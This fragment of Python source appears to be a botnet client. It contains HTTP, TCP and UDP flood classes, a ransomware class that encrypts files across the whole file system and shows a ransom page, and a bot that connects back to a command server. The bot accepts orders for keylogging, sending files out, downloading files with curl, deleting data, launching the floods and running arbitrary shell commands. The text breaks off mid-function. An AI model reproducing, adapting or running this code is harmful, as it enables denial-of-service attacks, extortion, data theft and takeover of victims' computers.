OpenSSL/0.9.7d', 'Links (2.1pre14; IRIX64 6.5 IP27; 145x54)', 'Wget/1.10.1', 
'ELinks/0.10.5 (textmode; FreeBSD 4.11-STABLE i386; 80x22-2)', 'Links (2.1pre20; FreeBSD 4.11-STABLE i386; 80x22)', 'Lynx/2.8.5rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d-p1', 'Opera/8.52 (X11; Linux i386; U; de)', 'Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.1) Gecko/20060310 Firefox/1.5.0.1', 'Mozilla/5.0 (X11; U; IRIX64 IP27; en-US; rv:1.4) Gecko/20030711', 'Mozilla/4.8 [en] (X11; U; IRIX64 6.5 IP27)', 'Mozilla/4.76 [en] (X11; U; SunOS 5.8 sun4m)', 'Opera/5.0 (SunOS 5.8 sun4m; U) [en]', 'Links (2.1pre15; SunOS 5.8 sun4m; 80x24)', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Wget/1.8.1', 'Wget/1.9.1', 'tnftp/20050625', 'Links (1.00pre12; Linux 2.6.14.2.20051115 i686; 80x24) (Debian pkg 0.99+1.00pre12-1)', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.0.16', 'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20051122', 'Wget/1.7', 'Lynx/2.8.2rel.1 libwww-FM/2.14', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; de) Opera 8.53', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7e', 'Links (2.1pre20; SunOS 5.10 sun4u; 80x22)', 'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7i', 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8) Gecko/20060202 Firefox/1.5', 'Opera/8.51 (X11; Linux i386; U; de)', 'Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i386--freebsd; X11)', 'Links (0.96; OpenBSD 3.0 sparc)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c', 'Lynx/2.8.3rel.1 libwww-FM/2.14', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)', 'libwww-perl/5.79', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.12) Gecko/20050919 Firefox/1.0.7', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)', 'msnbot/1.0 (+http://search.msn.com/msnbot.htm)', 'Googlebot/2.1 (+http://www.google.com/bot.html)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051008 Firefox/1.0.7', 'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51', 'Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7c', 'Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/4.8 [en] (Windows NT 5.1; U)', 'Opera/8.51 (Windows NT 5.1; U; en)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Opera/8.51 (Windows NT 5.1; U; en;VWP-online.de)', 'sproose/0.1-alpha (sproose crawler; http://www.sproose.com/bot.html; crawler@sproose.com)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0,gzip(gfe) (via translate.google.com)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'BrowserEmulator/0.9 see http://dejavu.org', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.4) Gecko/20030624', 'iCCrawler (http://www.iccenter.net/bot.htm)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)', 'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8) Gecko/20051111 Firefox/1.5', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.50', 'Mozilla/3.0 (x86 [de] Windows NT 5.0; Sun)', 'Java/1.4.1_04', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5', 'msnbot/0.9 (+http://search.msn.com/msnbot.htm)', 'NutchCVS/0.8-dev (Nutch running at UW; http://www.nutch.org/docs/en/bot.html; sycrawl@cs.washington.edu)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-14.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.53', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.4) Gecko/20030619 Netscape/7.1 (ax)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)', 'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)', 'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)', 'Mozilla/4.0 (compatible; MSIE 5.5; AOL 7.0; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)', 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)', 'Opera/8.53 (Windows NT 5.1; U; en)', 'Opera/8.01 (Windows NT 5.0; U; de)', 'Opera/8.54 (Windows NT 5.1; U; de)', 'Opera/8.53 (Windows NT 5.0; U; en)', 'Opera/8.01 (Windows NT 5.1; U; de)', 'Opera/8.50 (Windows NT 5.1; U; de)', 'Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322', 'Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)', 'Mozilla/4.0 (compatible; Cerberian Drtrs Version-3.2-Build-0)', 'Mozilla/4.0 (compatible; AvantGo 6.0; FreeBSD)', 'Mozilla/4.5 [de] (Macintosh; I; PPC)', 'Mozilla/4.0 (compatible; MSIE 
7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {59FC8AE0-2D88-C929-DA8D-B559D01826E7}; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|S04741035500914#914|isdn; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EnergyPlugIn; dial)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.02b)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; .NET CLR 1.0.3705)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; .NET CLR 1.0.3705)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ringo; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322; yplus 4.1.00b)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; YPC 3.2.0)', 'Mozilla/4.0 (compatible; MSIE 6.0; AOL 7.0; Windows NT 5.1; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; BUILDWARE 1.6; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; HbTools 4.7.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; (R1 1.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; it)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; FunWebProducts; HbTools 4.7.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; en)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312469)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; SV1; FDM)', 'Mozilla/5.0 (Macintosh; U; PPC; de-DE; rv:1.0.2)', 'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1)', 'Mozilla/5.0 (compatible; Konqueror/3.4; Linux 2.6.14-kanotix-9; X11)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)', 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS 
X; fr)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)', 'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)', 'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)', 'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)', 'Mozilla/5.0 (compatible; Konqueror/3; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)', 'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51'] return user_agents def stop_atk(self): self.stopatk = True def build_querystr(self, value): result = '' for i in range(value): item = random.randint(65, 100) result += chr(item) return result def ddos(self): code = 0 if not self.stopatk: try: agent = random.choice(self.useragents) req = urllib.request.Request(self.ip, headers={'User-Agent': agent, 'Referer': random.choice( self.referers) + self.build_querystr( random.randint(50, 100)), 'Cache-Control': 'no-cache', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive': random.randint(110, 160), 'Connection': 'keep-alive'}) urllib.request.urlopen(req) code = 200 except 
urllib.error.HTTPError as e: code_split = str(e).split() code = code_split[2] code = str(code[0] + code[1] + code[2]) if "500" in str(e): code = 500 elif "429" in str(e): code = 500 elif code.startswith('5'): code = 500 except urllib.error.URLError as e: if "A connection attempt failed" in str(e): code = 500 except: pass return code def start_thr(self): while True: try: x = threading.Thread(target=self.ddos) x.start() time.sleep(self.delay) if self.stopatk: break except: pass def ddos_start(self): while True: try: http_code = self.ddos() if http_code == 500: break if self.stopatk: break except: pass class TCP_UDP_Flood: def __init__(self, ip, port, delay, pkt_size): self.ip = ip self.port = int(port) self.delay = float(delay) self.pkt_size = int(pkt_size) self.stop = False def gen_packet(self, size): return random._urandom(size) def UDP_Req(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(self.gen_packet(self.pkt_size), (self.ip, self.port)) s.close() except: pass def TCP_req(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.ip, self.port)) s.send(self.gen_packet(self.pkt_size)) s.close() except: pass def Stop_Atk(self): self.stop = True def TCP_Flood(self): while True: try: tcp_req = threading.Thread(target=self.TCP_req) tcp_req.start() if self.stop: break time.sleep(self.delay) except: pass def UDP_Flood(self): while True: try: udp_req = threading.Thread(target=self.UDP_Req) udp_req.start() if self.stop: break time.sleep(self.delay) except: pass class RansomWare: def __init__(self, key): self.key = key self.fernet = Fernet(self.key) self.dirlist = [] self.filelist = [] self.keyfile = "key.txt" self.recovery_directory = "" if sys.platform == "win32": os.chdir("C:/Users/") self.recovery_directory = f"C:/Users/{os.getlogin()}/" else: self.recovery_directory = "/" os.chdir("/") def get_dir_list(self): for i in os.listdir(): try: file = open(i, "rb") file.close() self.filelist.append(os.path.join(os.getcwd(),i)) except: self.dirlist.append(os.path.join(os.getcwd(), i)) def encrypt_file(self, file): try: with open(file, "rb") as og_file: content = self.fernet.encrypt(og_file.read()) og_file.close() with open(file, "wb") as enc_file: enc_file.write(content) enc_file.close() except: pass def encrypt(self): self.get_dir_list() for i in self.dirlist: try: os.chdir(i) self.get_dir_list() except: pass for i in self.filelist: file_thread = threading.Thread(target=self.encrypt_file, args=(i,)) file_thread.start() self.ransom() self.checker = threading.Thread(target=self.check_key_file) self.checker.start() def decrypt(self): for i in self.filelist: try: with open(i,"rb") as enc_file: content = self.fernet.decrypt(enc_file.read()) enc_file.close() with open(i,"wb") as new_file: new_file.write(content) new_file.close() except: pass def download_emotional_support(self): cmd = subprocess.Popen(f"cd {self.recovery_directory}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) _cmd = subprocess.Popen(f"curl -o barbara.png https://i.redd.it/w2eduogz9ir51.png", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) def recovering_html_code(self): return f''' <!DOCTYPE html> <head></head> <title>You're in Luck | Your files are being decrypted!</title> <body bgcolor='red'> <h1>Lucky you!</h1> <h2>You have successfully put the correct encryption key into the text file({self.keyfile}).</h2> <h2>Please wait a moment, as the decrypted files are being decrypted at this moment. 
<h4>You can say your goodbyes to Barbara!</h4> <img src="barbara.png" alt="Where is the image?" width="300" height="500"> </body> ''' def ransom_html_code(self): return f''' <!DOCTYPE html> <head></head> <body bgcolor='red'> <title>Oops! | You've been Compromised!</title> <h1>Oops!</h1> <h2>Looks like your files have been encrypted.</h2> <h3>There is hope.</h3><br> A file has been created in this directory: {self.recovery_directory}{self.keyfile}<br> Simply place the encryption key of your files in the file(and this file only), and you will have your files back!<br> How you will get your key? Well, that's all up to the BotMaster. <h2>Heres a picture of Barbara! Perhaps she will give you emotional Support....</h2><br> <img src="barbara.png" alt="Where is the image?" width="300" height="500"> </body> ''' def check_key_file(self): while True: try: file = open(f"{self.recovery_directory}{self.keyfile}","rb") content = file.read() if bytes(content.strip()) == self.key: self.decryptor = threading.Thread(target=self.decrypt) self.decryptor.start() self.ransom(True) break time.sleep(1) except: pass def ransom(self, recovering=False): os.chdir(self.recovery_directory) if not recovering: keyfile = open(self.keyfile,"w") keyfile.close() self.download_emotional_support() filename = "Oops.html" else: filename = "Yay.html" bot.make_selffiles_encrypted_false() file = open(f"{self.recovery_directory}{filename}","w") if recovering: file.write(self.recovering_html_code()) else: file.write(self.ransom_html_code()) file.close() if sys.platform == "win32": os.startfile(file.name) else: os.system(f"open {file.name}") class Bot: def __init__(self, ip, port, enc_key): self.ip = ip self.port = port self.sendingfile = False self.enc_key = enc_key self.can_encrypt = False self.files_encrypted = False self.sql_connected = False self.keylogging = False self.keylogthreadstarted = False try: self.fernet = Fernet(self.enc_key) self.can_encrypt = True except: pass self.writefile = None self.writing_mode = False def get_ip(self): try: return urllib.request.urlopen(urllib.request.Request(url="https://httpbin.org/ip")).read().decode().strip().split('"')[3] except: try: return socket.gethostbyname(socket.gethostname()) except: return "127.0.0.1" def get_info(self): return f"!botreg {socket.gethostname()} {self.get_ip()} {os.getlogin()} {sys.platform}".encode() def connect(self): while True: try: self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.client.connect((self.ip, self.port)) banner = self.client.recv(1024).decode() time.sleep(5) break except: self.client.close() try: self.client.send(self.get_info()) except: pass reciever = threading.Thread(target=self.recv).start() self.pkt_sender = threading.Thread(target=self.check_still_connected).start() def initiate_connection(self): connect = threading.Thread(target=self.connect).start() def get_filename(self, msg): msg = msg.split() del msg[0] filename = "" for i in msg: filename += f" {i}" return filename.strip() def make_selffiles_encrypted_false(self): self.files_encrypted = False def check_still_connected(self): while True: try: self.client.send("".encode()) time.sleep(10) except: while True: try: reconnect = threading.Thread(target=self.connect).start() break except RuntimeError: pass break def recv(self): while True: try: msg = self.client.recv(10240).decode() if not self.sendingfile: while True: try: handle_msg = threading.Thread(target=self.send, args=(msg,)).start() break except RuntimeError: pass except Exception as e: self.client.close() while True: 
try: reconnect = threading.Thread(target=self.connect).start() break except RuntimeError: pass break def exec_sql_cmd(self, sqlfile, cmd): sql = sqlite3.connect(sqlfile) cursor = sql.cursor() cursor.execute(cmd) output = str(cursor.fetchall()) sql.commit() cursor.close() sql.close() return output def on_press(self, key): if self.keylogging: self.client.send(f"!key {key}".encode()) def on_release(self, key): pass def start_keylog(self): try: with Listener(on_press=self.on_press, on_release=self.on_release) as L: L.join() except: pass def return_actual_dir(self, direc): return direc.replace("%user%",os.getlogin()) def send(self, msg): msg = str(msg) if not self.writing_mode and not self.sql_connected: try: if msg.startswith("!open"): filename = self.get_filename(msg) if sys.platform == "win32": os.startfile(filename) else: os.system(f"open {filename}") elif msg.startswith("!keylog"): if not self.keylogging: if not self.keylogthreadstarted: keylogger = threading.Thread(target=self.start_keylog) keylogger.start() self.keylogging = True self.keylogthreadstarted = True elif msg.startswith("!stopkeylog"): self.keylogging = False elif msg.startswith('!httpflood'): msg = msg.split() ip = msg[1] delay = float(msg[2]) self.dos = DDoS(ip, delay) elif msg.startswith("!sqlconnect"): try: self.sql_connected = True self.sql_file = self.get_filename(msg) file = open(self.sql_file,"rb") file.close() item = self.exec_sql_cmd(self.sql_file, "select sql from sqlite_master") self.client.send(f"Successfully connected to the Database file: {self.sql_file}".encode()) except Exception as e: self.client.send(f"There was an error connecting to file '{self.sql_file}': {e}".encode()) self.sql_connected = False elif msg.startswith("!stopatk"): try: self.dos.stop_atk() except: pass try: self.tcpflood.Stop_Atk() except: pass try: self.udpflood.Stop_Atk() except: pass elif msg.startswith("!tcpflood"): msg_split = msg.split() ip = msg_split[1] try: port = int(msg_split[2]) except: port = 80 try: delay = float(msg_split[3]) except: delay = 0 try: pkt_size = int(msg_split[4]) except: pkt_size = 1024 self.tcpflood = TCP_UDP_Flood(ip, port, delay, pkt_size) self.tcp_flood = threading.Thread(target=self.tcpflood.TCP_Flood) self.tcp_flood.start() elif msg.startswith("!udpflood"): msg_split = msg.split() ip = msg_split[1] try: port = int(msg_split[2]) except: port = 80 try: delay = float(msg_split[3]) except: delay = 0 try: pkt_size = int(msg_split[4]) except: pkt_size = 1024 self.udpflood = TCP_UDP_Flood(ip, port, delay, pkt_size) self.udp_flood = threading.Thread(target=self.udpflood.UDP_Flood) self.udp_flood.start() elif msg.startswith("!getcwd"): cwd = os.getcwd() self.client.send(f"Current working directory: {os.getcwd()}".encode()) elif msg.startswith("!changedir"): newdir = self.return_actual_dir(self.get_filename(msg)) os.chdir(newdir) elif msg.startswith("!viewfilecontent"): file = msg.split()[1] self.client.send(open(file, "rb").read()) elif msg.startswith("!listdir"): self.client.send(f"Files in dir {os.getcwd()}: {os.listdir()}".encode()) elif msg.startswith("!mkdir"): dir = self.get_filename(msg) os.mkdir(dir) elif msg.startswith("!ransomware"): if not self.files_encrypted: self.ransomware = RansomWare(self.enc_key) self.ransomware.encrypt() self.files_encrypted = True elif msg.startswith("!createfile"): file = self.get_filename(msg) if file in os.listdir(): file += f"{random.randint(0,123456789)}" fileopened = open(file, "w") fileopened.close() elif msg.startswith("!delfile"): file = self.get_filename(msg) 
os.remove(file) self.client.send(f"File {file} has been deleted.".encode()) elif msg.startswith("!delfolder"): folder = self.get_filename(msg) shutil.rmtree(folder) self.client.send(f"Folder {folder} has been deleted.".encode()) elif msg.startswith("!writefile"): file = self.get_filename(msg) self.writefile = open(file, "rb") content = self.writefile.read() self.writefile.close() self.writefile = self.writefile.name self.writing_mode = True elif msg.startswith("!encfile"): if self.can_encrypt: file = self.get_filename(msg) fileopened = open(file,"rb") content = self.fernet.encrypt(fileopened.read()) fileopened.close() fileopened = open(file, "wb") fileopened.write(content) fileopened.close() self.client.send(f"File {file} has been encrypted.".encode()) else: self.client.send("Cannot encrypt files due to cryptography not being installed.".encode()) elif msg.startswith("!decrypt"): if self.can_encrypt: file = self.get_filename(msg) fileopened = open(file,"rb") try: content = self.fernet.decrypt(fileopened.read()) fileopened.close() fileopened = open(file, "wb") fileopened.write(content) fileopened.close() self.client.send(f"File {file} has been decrypted.".encode()) except Exception as e: self.client.send(f"There was en error with decrypting file {file}.".encode()) else: self.client.send("Cannot decrypt files due to cryptography not being installed.".encode()) elif msg.startswith("!filedownload"): try: file = self.get_filename(msg) file = open(file, "rb") self.sendingfile = True while True: sendto = file.read(10240) if not sendto: time.sleep(3) self.client.send("!stopsave".encode()) self.sendingfile = False break else: self.client.send(sendto) time.sleep(1) self.client.send("File transfer to server completed.".encode()) except: self.client.send("File was not found in the bot directory.".encode()) time.sleep(3) self.client.send("!stopsave".encode()) elif msg.startswith("!download"): try: link = msg.split()[1] file = msg.split()[2] cmd = subprocess.Popen(f"curl -o {file} {link}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) self.client.send(f"File {file} has been downloaded from {link}.".encode()) except: self.client.send(f"There was an error with downloading the file.".encode()) else: cmd = subprocess.Popen(msg, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) self.client.send(cmd.stdout.read()) self.client.send(cmd.stderr.read()) except Exception as e: pass elif self.writing_mode: write_msg = f"\\n{msg}".encode() if msg == "!stopwrite": self.writing_mode = False else: file = open(self.writefile, "rb") content = file.read() file.close() file = open(self.writefile,"wb") file.write(content) file.write(write_msg) elif self.sql_connected: if msg.startswith("!stopsql"): self.sql_connected = False self.client.send("Disconnecting from the Sqlite3 Database file.".encode()) else: try: output = self.exec_sql_cmd(self.sql_file, msg) 